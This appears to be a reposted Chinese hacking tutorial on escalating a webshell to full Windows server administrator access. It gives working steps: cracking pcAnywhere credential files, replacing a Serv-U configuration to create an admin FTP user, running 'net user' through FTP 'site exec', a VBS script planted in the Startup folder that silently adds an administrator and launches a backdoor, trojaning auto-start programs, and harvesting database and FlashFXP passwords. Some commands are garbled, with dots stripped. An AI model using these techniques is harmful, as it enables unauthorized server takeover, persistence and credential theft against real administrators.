
说到花了九牛二虎的力气获得了一个webshell,
当然还想继续获得整个服务器的admin权限,正如不想得到admin的不是好黑客~
嘻嘻~~好跟我来,看看有什么可以利用的来提升权限
第一
如果服务器上有装了pcanywhere服务端,管理员为了管理方便
也给了我们方便,到系统盘的Documents and Settings/All Us
ers/Application Data/Symantec/pcAnywhere/中下载cif本地
破解就使用pcanywhere连接就ok了
第二
有很多小黑问我这么把webshell的iis user权限提升
一般服务器的管理都是本机设计完毕然后上传到空间里,
那么就会用到ftp,服务器使用最多的就是servu
那么我们就利用servu来提升权限
通过servu提升权限需要servu安装目录可写~
好开始把,首先通过webshell访问servu安装文件夹下的ServUDaemonini把他下载
下来,然后在本机上安装一个servu把ServUDaemonini放到本地安装文件夹下覆盖,
启动servu添加了一个用户,设置为系统管理员,目录C:\,具有可执行权限
然后去servu安装目录里把ServUDaemonini更换服务器上的。
用我新建的用户和密码连接~
好的,还是连上了
ftp
ftp>open ip
Connected to ip
220 Serv-U FTP Server v5004 for WinSock ready
User (ip:(none)): id //刚才添加的用户
331 User name okay, please send complete E-mail address as password
Password:password //密码
230 User logged in, proceed
ftp> cd winnt //进入win2k的winnt目录
250 Directory changed to /WINNT
ftp>cd system32 //进入system32目录
250 Directory changed to /WINNT/system32
ftp>quote site exec netexe user rover rover1234 /add //利用系统的netexe
文件加用户。
如果提示没有权限,那我们就
把后门(serverexe) 传他system32目录
然后写一个VBs教本
set wshshell=createobject ("wscriptshell")
a=wshshellrun ("cmdexe /c net user user pass /add",0)
b=wshshellrun ("cmdexe /c net localgroup Administrators user /add",0)
b=wshshellrun ("cmdexe /c serverexe",0)
存为xxvbe
这个教本的作用是建立user用户密码为pass
并且提升为管理员
然后执行system32目录下的serverexe
把这个教本传他 C:\Documents and Settings\All Users\「开始」菜单\程序\启动
目录
这样管理员只要一登陆就会执行那个教本
接下来就是等了等他登陆
第三
就是先检查有什么系统服务,或者随系统启动自动启动的程序和管理员经常使用的软件, 比如诺顿,VAdministrator,金山,瑞星,WinRAR甚至QQ之类的,是否可以写,如果可以就修改其程序, 绑定一个批处理或者VBS,然后还是等待服务器重启。
第四
查找conn和config ,pass这类型的文件看能否得到sa或者mysql的相关密码,可能会有所
收获等等。
第五
使用Flashfxp也能提升权限,但是成功率就看你自己的运气了
首先找到FlashFXP文件夹,打开(编辑)Sites dat,这个文件这是什么东西密码和用户名,
而且密码是
这服务器安全不错(可能是一个空间就没办法了)不是空间的话,能利用的只有ftp,如果ftp有漏洞的话,,,,
如果c盘的,,,启动文件夹有写权限的话加个建开3389和建用户的批处理
方法很多,自己动脑筋,shell又不在我手上
WebShell是一种常见的网页后门,它常常被攻击者用来获取Web服务器的 *** 作权限。攻击者在进行网站入侵时,通常会将WebShell文件与Web目录下的长长网页文件放置在一起,然后通过浏览器访问WebShell文件,从而获取命令执行环境,最终达到控制网站服务器的目的。
当网站服务器被控制后,就可以在其上任意查看数据库、上传下载文件以及执行任意程序命令等。WebShell与正常网页具有相同的运行环境和服务端口,它与远程主机通过>
看什么账号,如果是sa或者root被泄露就可能被直接入侵,其它的账号被泄露也有被入侵的概率比如:通过数据库得到网站管理员的账号密码,再利用网站漏洞得到webshell,再进一步控制服务器
以上就是关于拿到WEBSHELL如何提权~全部的内容,包括:拿到WEBSHELL如何提权~、拿到一个webshell,该如何提权呢。、悬镜中的webshell是如何使用的等相关内容解答,如果想了解更多相关内容,可以关注我们,你们的支持是我们更新的动力!
欢迎分享,转载请注明来源:内存溢出
微信扫一扫
支付宝扫一扫
评论列表(0条)